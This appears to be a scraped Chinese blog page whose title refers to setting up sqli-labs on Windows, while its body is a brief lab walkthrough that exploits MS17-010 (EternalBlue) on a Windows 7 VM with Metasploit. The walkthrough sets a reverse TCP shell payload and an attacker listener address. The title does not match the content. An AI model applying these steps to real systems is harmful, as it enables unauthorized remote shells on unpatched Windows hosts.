当前位置: 首页 > news >正文

Widows搭建sqli-labs

news 2025/6/28 23:42:50

使用ms17_010渗透win7

ms17_010针对windows445端口(共享文件), 现有一台win7虚拟机IP 192.168.80.129, 开放445端口, 使用msf渗透该虚拟机

auxiliary

使用auxiliary判断目标主机是否适用smb17_010漏洞

这里发现80网段, 有一台主机适用

exploit

使用search ms17_010 type:exploit来查找对应的攻击模块

这里使用exploit/windows/smb/ms17_010_eternalblue, 填写相关参数

payload

攻击载荷, 执行具体的攻击, 这里使用payload/windows/x64/shell/reverse_tcp, 会让攻击机与目标机建立shell连接

set payload/windows/x64/shell/reverse_tcp

设置shell本地监听端口 set lhost 192.168.80.200

run

执行run命令连接目标机, 有一定机率无法连接。

由于windows dos窗口使用gbk编码, 所以会出现乱码。使用chcp65001将编码改为utf-8

最后我也整理了一些网络安全(黑客)方面的学习进阶资料

如果你想跟同道中人交流

http://www.lryc.cn/news/522660.html

相关文章:

  • 为AI聊天工具添加一个知识系统 之46 蒙板程序设计(第一版):Facet六边形【意识形态:操纵】
  • ASP.NET Core WebApi接口IP限流实践技术指南
  • 文件移动工具 (File Mover)
  • PTA L1-039 古风排版
  • Docker 镜像加速的配置
  • 简历_使用优化的Redis自增ID策略生成分布式环境下全局唯一ID,用于用户上传数据的命名以及多种ID的生成
  • PHP的HMAC_SHA1和HMAC_MD5算法方法
  • 二进制/源码编译安装mysql 8.0
  • 2025-1-15-十大经典排序算法 C++与python
  • 头盔识别技术
  • DeepSeek-v3在训练和推理方面的优化
  • 将 AzureBlob 的日志通过 Azure Event Hubs 发给 Elasticsearch(3 纯python的经济方案)
  • 1️⃣Java中的集合体系学习汇总(List/Map/Set 详解)
  • 闪豆多平台视频批量下载器
  • 深入解析:如何用Java爬取淘宝分类详情接口(cat_get)
  • 语音识别的预训练模型
  • element-ui制作多颜色选择器
  • JVM体系结构
  • wandb使用遇到的一些问题
  • Java中的继承
  • Cadence笔记--原理图导入PCB
  • 从AI生成内容到虚拟现实:娱乐体验的新边界
  • 【Linux】gdb_进程概念
  • 安全类脚本:拒绝ssh暴力破解
  • Android15源码编译问题处理
  • 图解Git——分布式Git《Pro Git》
  • Linux内核编程(二十一)USB应用及驱动开发
  • 什么是数据仓库?
  • 计算机网络 (48)P2P应用
  • SK海力士(SK Hynix)是全球领先的半导体制造商之一,其在无锡的工厂主要生产DRAM和NAND闪存等存储器产品。